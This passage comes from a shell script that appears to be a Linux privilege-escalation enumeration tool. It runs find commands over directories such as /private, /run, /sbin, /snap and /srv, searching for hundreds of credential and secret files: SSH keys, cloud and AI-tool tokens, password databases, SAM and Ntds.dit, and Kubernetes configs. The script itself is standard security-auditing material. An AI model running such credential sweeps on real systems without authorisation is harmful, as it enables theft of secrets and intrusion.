\"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 778 FIND_PRIVATE=`eval_bckgrd "find ${ROOT_FOLDER}private -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"sess_*\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 779 FIND_RUN=`eval_bckgrd "find ${ROOT_FOLDER}run -name \"*.timer\" -o -name \"*.socket\" -o -name \"ssh-agent.sock\" -o -name \"agent.*\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 780 FIND_SBIN=`eval_bckgrd "find ${ROOT_FOLDER}sbin -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 781 FIND_SNAP=`eval_bckgrd "find ${ROOT_FOLDER}snap -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 782 FIND_SRV=`eval_bckgrd "find ${ROOT_FOLDER}srv -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name 